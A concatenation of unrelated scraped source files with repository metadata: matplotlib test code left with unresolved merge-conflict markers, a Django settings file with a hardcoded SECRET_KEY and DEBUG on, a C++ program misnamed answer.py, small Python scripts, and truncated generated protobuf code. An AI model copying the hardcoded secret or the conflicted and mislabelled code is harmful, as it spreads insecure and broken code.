371b4a3ef74327f5b87793eb24cc846c854d2160 | 9ca8da461ac27ad18ceee5e81a60b17e7b3c4a8c | /venv/Lib/site-packages/matplotlib/tests/test_ttconv.py | 3bbe7af9c73844ce54a7320e0c963ddf605e1b8e | [] | no_license | LielVaknin/OOP-Ex3 | 1c2e36436ffe6b701e46efec77d4beb4aba711bf | 4b830b6806c6d8013332992241dce01cc81634d7 | refs/heads/master | 2023-02-11T05:10:20.460355 | 2021-01-14T18:18:22 | 2021-01-14T18:18:22 | 328,455,478 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,150 | py | <<<<<<< HEAD
from pathlib import Path
import matplotlib
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
@image_comparison(["truetype-conversion.pdf"])
# mpltest.ttf does not have "l"/"p" glyphs so we get a warning when trying to
# get the font extents.
def test_truetype_conversion(recwarn):
matplotlib.rcParams['pdf.fonttype'] = 3
fig, ax = plt.subplots()
ax.text(0, 0, "ABCDE",
font=Path(__file__).with_name("mpltest.ttf"), fontsize=80)
ax.set_xticks([])
ax.set_yticks([])
=======
from pathlib import Path
import matplotlib
from matplotlib.testing.decorators import image_comparison
import matplotlib.pyplot as plt
@image_comparison(["truetype-conversion.pdf"])
# mpltest.ttf does not have "l"/"p" glyphs so we get a warning when trying to
# get the font extents.
def test_truetype_conversion(recwarn):
matplotlib.rcParams['pdf.fonttype'] = 3
fig, ax = plt.subplots()
ax.text(0, 0, "ABCDE",
font=Path(__file__).with_name("mpltest.ttf"), fontsize=80)
ax.set_xticks([])
ax.set_yticks([])
>>>>>>> d504ded9f01eece931e11d704f3a8d91c4eb88b4
| [
"[email protected]"
] | |
28b184b624819b1c5d9358d7ca85f7b19ddc8eb9 | e00130d5aa146c344c8c31a491ced75e3c41463a | /agentzero/version.py | 3589800bd14458e7efe469103396f42a3e578825 | [] | no_license | gabrielfalcao/agentzero | 9b0eb0cc9b7076786d5b5c6821ca28a1dc2dbf19 | ee18af5b7fdbb77540e7658d3f85c8a7b76f8bc9 | refs/heads/master | 2023-01-11T02:48:57.661321 | 2022-12-27T20:12:55 | 2022-12-27T20:12:55 | 52,629,552 | 10 | 1 | null | 2019-12-20T17:18:39 | 2016-02-26T20:05:23 | Python | UTF-8 | Python | false | false | 65 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
version = "0.4.6"
| [
"[email protected]"
] | |
119cf069fba05ec41726845576cf1a5f7597599c | 788965833baa87fec02520ebccde379bf03198bc | /askcompany/settings/common.py | 3cbb1f9fc7b5a61b00f31452e4465a468f4f49d3 | [] | no_license | sungchan1025/django-with-react-rev2 | e907bfb464a1a9ed0061d5829257558426335fcd | 62bf5b5e57e8c791e0c74bf4e496f3bc79de8c4b | refs/heads/master | 2022-04-07T03:11:39.990147 | 2020-02-16T05:50:50 | 2020-02-16T05:50:50 | 273,150,775 | 1 | 0 | null | 2020-06-18T05:36:54 | 2020-06-18T05:36:54 | null | UTF-8 | Python | false | false | 4,025 | py | """
Django settings for askcompany project.
Generated by 'django-admin startproject' using Django 3.0.3.
For more information on this file, see
https://docs.djangoproject.com/en/3.0/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.0/ref/settings/
"""
import os
from os.path import abspath, dirname
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = dirname(dirname(dirname(abspath(__file__))))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.0/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '(2%h=*epx5m=qapxh+5o=$6_6lk^lsikbbw3udc#k=s_xd2mzm'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
ADMINS = [
('Chinseok Lee', '[email protected]'),
]
# Application definition
INSTALLED_APPS = [
# Django Apps
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.humanize',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
# Third Apps
'bootstrap4',
'debug_toolbar',
'django_pydenticon',
'easy_thumbnails',
# Locals Apps
'accounts',
'instagram',
]
MIDDLEWARE = [
'debug_toolbar.middleware.DebugToolbarMiddleware',
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'askcompany.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [
os.path.join(BASE_DIR, 'askcompany', 'templates'),
],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'askcompany.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.0/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
AUTH_USER_MODEL = "accounts.User"
# Password validation
# https://docs.djangoproject.com/en/3.0/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.0/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.0/howto/static-files/
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'askcompany', 'static'),
]
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
MEDIA_URL = '/media/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
INTERNAL_IPS = ['127.0.0.1']
# Email with Send Grid
SENDGRID_API_KEY = os.environ.get("SENDGRID_API_KEY")
EMAIL_HOST = 'smtp.sendgrid.net'
EMAIL_HOST_USER = 'apikey'
EMAIL_HOST_PASSWORD = SENDGRID_API_KEY
EMAIL_PORT = 587
EMAIL_USE_TLS = True
WELCOME_EMAIL_SENDER = "[email protected]"
| [
"[email protected]"
] | |
6bda908e9230dfb4ccd5c22e157ae0537128b390 | cf543dda5dc841b3eb7063d78821fbbdbd8f9d60 | /tests/conftest.py | 7ebcb25452700b0c985871fb03296261e0d46991 | [
"BSD-3-Clause"
] | permissive | mdxs/json-spec | 2b66a9b792210188788a04138e8e2e9fea4aed89 | f093a2d47e899990e023a13a29f94b9aebdae5ab | refs/heads/master | 2021-01-18T03:14:28.420809 | 2015-07-07T14:34:37 | 2015-07-07T14:36:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 177 | py | import sys
def pytest_cmdline_preparse(args):
if 'pytest_cov' in sys.modules: # pytest-xdist plugin
args[:] = ['--cov', 'jsonspec', '--cov-report', 'html'] + args
| [
"[email protected]"
] | |
2b35f8032e339afc72a833ccfba443d92be9e9e2 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/Cases/2937/.mooctest/answer.py | 075d4f8539d3f652a78d8e28ff7dc8eaa60bc42f | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 586 | py | #include<iostream>
using namespace std;
char a[16], b[16] = {'C', 'O', 'D', 'E', 'F', 'E', 'S', 'T', 'I', 'V', 'A', 'L', '2', '0', '1', '6'};//直接字符数组走一波,后面比较方便
int ans;//定义ans为答案/在函数外面定义的全局变量初始值默认为0
int main()
{
cin >> a;//不需要一个字符一个字符的输,题目数据全都是16位的,不用担心超界限
for(int i = 0; i < 16; i ++){
if(a[i] != b[i]) ans ++;//循环比较,如果不一样ans+1
}
cout << ans << endl;//endl可以不加
return 0;//养成好习惯
} | [
"[email protected]"
] | |
724cb5e6e6271b7e8dbf448bcc2f40bfd0712d1f | 87fecbc5b4e6ae4b2a0c32c45e20eb1fec2ebcdd | /Siyam Solved/Problem Set -2/Solutions- 2/7.py | d9e973e8e12bc7f464b259713babb0d6a8e4b005 | [] | no_license | siyam04/python_problems_solutions | 08aa2bc17342ee85fdcd90ef96bd8eeed0699726 | 7b271d98e4d600bca31061e57ce792f5d9913991 | refs/heads/master | 2020-06-27T22:56:48.973484 | 2019-08-01T15:33:18 | 2019-08-01T15:33:18 | 200,075,594 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 293 | py | def EvenCount ():
L = []
count =sum([1 for i in range(1, 9) if i % 2 == 0])
return count
def OddCount ():
L = []
count =sum([1 for i in range(1, 9) if i % 2 != 0])
return count
print("Total EVEN numbers are:", EvenCount())
print("Total ODD numbers are:", OddCount())
| [
"[email protected]"
] | |
edb496f47578df1e8327f71f94f3e27bce57874f | 0fc27c29f508a3b0f38f1bab10c543903306aa93 | /python/machinetalk/protobuf/object_pb2.py | f10339ae4595542f8f277705b24208435be5a9c6 | [
"MIT"
] | permissive | luminize/machinetalk-protobuf | 91604f6a933e1feb6ccf80e05caf86ad649c1a5a | 6ca7c99806401179ece164b07dc87852bfa8df9c | refs/heads/master | 2020-05-23T22:16:34.309507 | 2018-11-14T06:53:25 | 2018-11-14T06:53:25 | 186,970,319 | 0 | 0 | MIT | 2019-05-16T06:58:34 | 2019-05-16T06:58:31 | null | UTF-8 | Python | false | true | 69,227 | py | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: machinetalk/protobuf/object.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from machinetalk.protobuf import nanopb_pb2 as machinetalk_dot_protobuf_dot_nanopb__pb2
from machinetalk.protobuf import types_pb2 as machinetalk_dot_protobuf_dot_types__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='machinetalk/protobuf/object.proto',
package='machinetalk',
syntax='proto2',
serialized_pb=_b('\n!machinetalk/protobuf/object.proto\x12\x0bmachinetalk\x1a!machinetalk/protobuf/nanopb.proto\x1a machinetalk/protobuf/types.proto\",\n\x08Instance\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\n\n\x02id\x18\x02 \x01(\x0f:\x06\x92?\x03H\xbc\x05\"\xb7\x01\n\x13ServiceAnnouncement\x12\'\n\x05stype\x18\x01 \x02(\x0e\x32\x18.machinetalk.ServiceType\x12\x12\n\x07version\x18\x02 \x02(\x07:\x01\x30\x12\x13\n\x08instance\x18\x03 \x02(\x07:\x01\x30\x12$\n\x03\x61pi\x18\x08 \x02(\x0e\x32\x17.machinetalk.ServiceAPI\x12\x0b\n\x03uri\x18\x06 \x02(\t\x12\x13\n\x0b\x64\x65scription\x18\x07 \x01(\t:\x06\x92?\x03H\xbd\x05\"\xab\x01\n\nOriginator\x12\'\n\x06origin\x18\x01 \x01(\x0e\x32\x17.machinetalk.OriginType\x12)\n\x06\x64\x65tail\x18\x02 \x01(\x0e\x32\x19.machinetalk.OriginDetail\x12\x0c\n\x04name\x18\x03 \x01(\t\x12\n\n\x02id\x18\x04 \x01(\x0f\x12\'\n\x08instance\x18\x05 \x01(\x0b\x32\x15.machinetalk.Instance:\x06\x92?\x03H\xbe\x05\"\x8b\x01\n\x07\x41nError\x12\x12\n\nerror_code\x18\x01 \x02(\x0f\x12\'\n\x08severity\x18\x02 \x01(\x0e\x32\x15.machinetalk.Severity\x12\x12\n\nerror_text\x18\x03 \x01(\t\x12\'\n\x06origin\x18\x04 \x01(\x0b\x32\x17.machinetalk.Originator:\x06\x92?\x03H\xbf\x05\"\x8e\x02\n\x03Pin\x12$\n\x04type\x18\x01 \x01(\x0e\x32\x16.machinetalk.ValueType\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06handle\x18\x03 \x01(\x07\x12)\n\x03\x64ir\x18\x04 \x01(\x0e\x32\x1c.machinetalk.HalPinDirection\x12\x0e\n\x06halbit\x18\x05 \x01(\x08\x12\x10\n\x08halfloat\x18\x06 \x01(\x01\x12\x0e\n\x06hals32\x18\x07 \x01(\x0f\x12\x0e\n\x06halu32\x18\x08 \x01(\x07\x12\r\n\x05owner\x18\t \x01(\x0f\x12\x0e\n\x06linked\x18\n \x01(\x08\x12\x0f\n\x07oldname\x18\x0b \x01(\t\x12\x0f\n\x07\x65psilon\x18\x0c \x01(\x01\x12\r\n\x05\x66lags\x18\r \x01(\x07:\x06\x92?\x03H\xc0\x05\"\xe6\x01\n\x06Signal\x12$\n\x04type\x18\x01 \x01(\x0e\x32\x16.machinetalk.ValueType\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06handle\x18\x03 \x01(\x07\x12\x0e\n\x06halbit\x18\x05 \x01(\x08\x12\x10\n\x08halfloat\x18\x06 \x01(\x01\x12\x0e\n\x06hals32\x18\x07 \x01(\x0f\x12\x0e\n\x06halu32\x18\x08 \x01(\x07\x12\x0e\n\x06strval\x18\t \x01(\t\x12\x0c\n\x04\x62lob\x18\n \x01(\x0c\x12\x0f\n\x07readers\x18\x0b \x01(\x07\x12\x0f\n\x07writers\x18\x0c \x01(\x07\x12\x0e\n\x06\x62idirs\x18\r \x01(\x07:\x06\x92?\x03H\xc1\x05\"\xa2\x02\n\x05Param\x12$\n\x04type\x18\x01 \x01(\x0e\x32\x16.machinetalk.ValueType\x12\x0c\n\x04name\x18\x02 \x01(\t\x12\x0e\n\x06handle\x18\x03 \x01(\x07\x12\x0e\n\x06halbit\x18\x05 \x01(\x08\x12\x10\n\x08halfloat\x18\x06 \x01(\x01\x12\x0e\n\x06hals32\x18\x07 \x01(\x0f\x12\x0e\n\x06halu32\x18\x08 \x01(\x07\x12\x0e\n\x06strval\x18\t \x01(\t\x12\x0c\n\x04\x62lob\x18\n \x01(\x0c\x12+\n\x03\x64ir\x18\x0b \x01(\x0e\x32\x1e.machinetalk.HalParamDirection\x12\x0f\n\x07oldname\x18\x0c \x01(\t\x12\r\n\x05owner\x18\r \x01(\x0f\x12\x0f\n\x07runtime\x18\x0e \x01(\x0f\x12\x0f\n\x07maytime\x18\x0f \x01(\x0f:\x06\x92?\x03H\xc2\x05\"\xca\x01\n\x08\x46unction\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x10\n\x08owner_id\x18\x03 \x01(\x07\x12\r\n\x05users\x18\x04 \x01(\x07\x12\x0f\n\x07runtime\x18\x05 \x01(\x07\x12\x0f\n\x07maxtime\x18\x06 \x01(\x07\x12\x11\n\treentrant\x18\x07 \x01(\x08\x12\'\n\x04type\x18\x08 \x01(\x0e\x32\x19.machinetalk.HalFunctType\x12\x19\n\x11maxtime_increased\x18\t \x01(\x08:\x06\x92?\x03H\xc3\x05\"\x94\x01\n\x06Thread\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x0f\n\x07uses_fp\x18\x03 \x01(\x08\x12\x0e\n\x06period\x18\x04 \x01(\x07\x12\x10\n\x08priority\x18\x05 \x01(\x0f\x12\x0f\n\x07task_id\x18\x06 \x01(\x07\x12\x0e\n\x06\x63pu_id\x18\x07 \x01(\x07\x12\x10\n\x08\x66unction\x18\x08 \x03(\t:\x06\x92?\x03H\xc4\x05\"\xe6\x02\n\tComponent\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\r\n\x05ninst\x18\x02 \x01(\x07\x12\x0f\n\x07\x63omp_id\x18\x04 \x01(\x0f\x12\x0c\n\x04type\x18\x05 \x01(\x07\x12\r\n\x05state\x18\x06 \x01(\x07\x12\x13\n\x0blast_update\x18\x07 \x01(\x07\x12\x12\n\nlast_bound\x18\x08 \x01(\x07\x12\x14\n\x0clast_unbound\x18\t \x01(\x07\x12\x0b\n\x03pid\x18\n \x01(\x07\x12\x0c\n\x04\x61rgs\x18\x0b \x01(\t\x12\r\n\x05timer\x18\x0c \x01(\x0f\x12\x10\n\x08userarg1\x18\x0e \x01(\x0f\x12\x10\n\x08userarg2\x18\x0f \x01(\x0f\x12\x1d\n\x03pin\x18\x10 \x03(\x0b\x32\x10.machinetalk.Pin\x12!\n\x05param\x18\x11 \x03(\x0b\x32\x12.machinetalk.Param\x12$\n\x05\x66unct\x18\x13 \x03(\x0b\x32\x15.machinetalk.Function\x12\x11\n\tno_create\x18\x12 \x01(\x08:\x06\x92?\x03H\xc5\x05\"\xee\x01\n\x04Ring\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\r\n\x05owner\x18\x03 \x01(\x0f\x12\x0e\n\x06stream\x18\x04 \x01(\x08\x12\x0e\n\x06wmutex\x18\x05 \x01(\x08\x12\x0e\n\x06rmutex\x18\x06 \x01(\x08\x12\x11\n\trtapi_shm\x18\x07 \x01(\x08\x12\x0e\n\x06reader\x18\x08 \x01(\x0f\x12\x0e\n\x06writer\x18\t \x01(\x0f\x12\x12\n\ntotal_size\x18\n \x01(\x0f\x12\x12\n\nscratchpad\x18\x0b \x01(\x0f\x12\x13\n\x0bring_shmkey\x18\x0c \x01(\x0f\x12\x11\n\tencodings\x18\r \x01(\x07:\x06\x92?\x03H\xc6\x05\"\xe5\x01\n\x06Member\x12&\n\x05mtype\x18\x01 \x01(\x0e\x32\x17.machinetalk.ObjectType\x12\x10\n\x08userarg1\x18\x02 \x01(\x0f\x12\x0f\n\x07\x65psilon\x18\x03 \x01(\x01\x12#\n\x06signal\x18\x04 \x01(\x0b\x32\x13.machinetalk.Signal\x12\x11\n\tgroupname\x18\x05 \x01(\t\x12\x0e\n\x06handle\x18\x06 \x01(\x07\x12\x1d\n\x03pin\x18\x07 \x01(\x0b\x32\x10.machinetalk.Pin\x12!\n\x05param\x18\x08 \x01(\x0b\x32\x12.machinetalk.Param:\x06\x92?\x03H\xc7\x05\"\x88\x01\n\x05Group\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x10\n\x08userarg1\x18\x04 \x01(\x0f\x12\x10\n\x08userarg2\x18\x05 \x01(\x0f\x12\x10\n\x08refcount\x18\x06 \x01(\x0f\x12#\n\x06member\x18\x07 \x03(\x0b\x32\x13.machinetalk.Member:\x06\x92?\x03H\xc8\x05\"_\n\x12ProtocolParameters\x12\x17\n\x0fkeepalive_timer\x18\x01 \x01(\x0f\x12\x13\n\x0bgroup_timer\x18\x02 \x01(\x0f\x12\x13\n\x0brcomp_timer\x18\x03 \x01(\x0f:\x06\x92?\x03H\xc9\x05\"\x84\x01\n\x06Vtable\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0e\n\x06handle\x18\x02 \x01(\x07\x12\x10\n\x08owner_id\x18\x03 \x01(\x0f\x12\x0f\n\x07\x63ontext\x18\x05 \x01(\x07\x12\x10\n\x08refcount\x18\x06 \x01(\x0f\x12\x0f\n\x07version\x18\x07 \x01(\x0f\x12\x0e\n\x06vtable\x18\x08 \x01(\x06:\x06\x92?\x03H\xca\x05\"\xc9\x01\n\x04Inst\x12\x0c\n\x04name\x18\x01 \x01(\t\x12\x0f\n\x07\x63omp_id\x18\x02 \x01(\x0f\x12\x0f\n\x07inst_id\x18\x03 \x01(\x07\x12\x11\n\tinst_size\x18\x04 \x01(\x07\x12\x0e\n\x06vtable\x18\x05 \x01(\x06\x12\x1d\n\x03pin\x18\x10 \x03(\x0b\x32\x10.machinetalk.Pin\x12!\n\x05param\x18\x11 \x03(\x0b\x32\x12.machinetalk.Param\x12$\n\x05\x66unct\x18\x13 \x03(\x0b\x32\x15.machinetalk.Function:\x06\x92?\x03H\xcb\x05')
,
dependencies=[machinetalk_dot_protobuf_dot_nanopb__pb2.DESCRIPTOR,machinetalk_dot_protobuf_dot_types__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_INSTANCE = _descriptor.Descriptor(
name='Instance',
full_name='machinetalk.Instance',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Instance.name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='id', full_name='machinetalk.Instance.id', index=1,
number=2, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\274\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=163,
)
_SERVICEANNOUNCEMENT = _descriptor.Descriptor(
name='ServiceAnnouncement',
full_name='machinetalk.ServiceAnnouncement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='stype', full_name='machinetalk.ServiceAnnouncement.stype', index=0,
number=1, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='version', full_name='machinetalk.ServiceAnnouncement.version', index=1,
number=2, type=7, cpp_type=3, label=2,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='instance', full_name='machinetalk.ServiceAnnouncement.instance', index=2,
number=3, type=7, cpp_type=3, label=2,
has_default_value=True, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='api', full_name='machinetalk.ServiceAnnouncement.api', index=3,
number=8, type=14, cpp_type=8, label=2,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='uri', full_name='machinetalk.ServiceAnnouncement.uri', index=4,
number=6, type=9, cpp_type=9, label=2,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='description', full_name='machinetalk.ServiceAnnouncement.description', index=5,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\275\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=166,
serialized_end=349,
)
_ORIGINATOR = _descriptor.Descriptor(
name='Originator',
full_name='machinetalk.Originator',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='origin', full_name='machinetalk.Originator.origin', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='detail', full_name='machinetalk.Originator.detail', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=10,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Originator.name', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='id', full_name='machinetalk.Originator.id', index=3,
number=4, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='instance', full_name='machinetalk.Originator.instance', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\276\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=352,
serialized_end=523,
)
_ANERROR = _descriptor.Descriptor(
name='AnError',
full_name='machinetalk.AnError',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='error_code', full_name='machinetalk.AnError.error_code', index=0,
number=1, type=15, cpp_type=1, label=2,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='severity', full_name='machinetalk.AnError.severity', index=1,
number=2, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='error_text', full_name='machinetalk.AnError.error_text', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='origin', full_name='machinetalk.AnError.origin', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=_descriptor._ParseOptions(descriptor_pb2.MessageOptions(), _b('\222?\003H\277\005')),
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=526,
serialized_end=665,
)
_PIN = _descriptor.Descriptor(
name='Pin',
full_name='machinetalk.Pin',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='type', full_name='machinetalk.Pin.type', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=1,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='name', full_name='machinetalk.Pin.name', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='handle', full_name='machinetalk.Pin.handle', index=2,
number=3, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='dir', full_name='machinetalk.Pin.dir', index=3,
number=4, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=16,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halbit', full_name='machinetalk.Pin.halbit', index=4,
number=5, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halfloat', full_name='machinetalk.Pin.halfloat', index=5,
number=6, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='hals32', full_name='machinetalk.Pin.hals32', index=6,
number=7, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='halu32', full_name='machinetalk.Pin.halu32', index=7,
number=8, type=7, cpp_type=3, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='owner', full_name='machinetalk.Pin.owner', index=8,
number=9, type=15, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='linked', full_name='machinetalk.Pin.linked', index=9,
number=10, type=8, cpp_type=7, label=1,
has_default_value=False, default_value=False,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='oldname', full_name='machinetalk.Pin.oldname', index=10,
number=11, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=_b("").decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='epsilon', full_name='machinetalk.Pin.epsilon', index=11,
number=12, type=1, cpp_type=5, label=1,
has_default_value=False, default_value=float(0),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
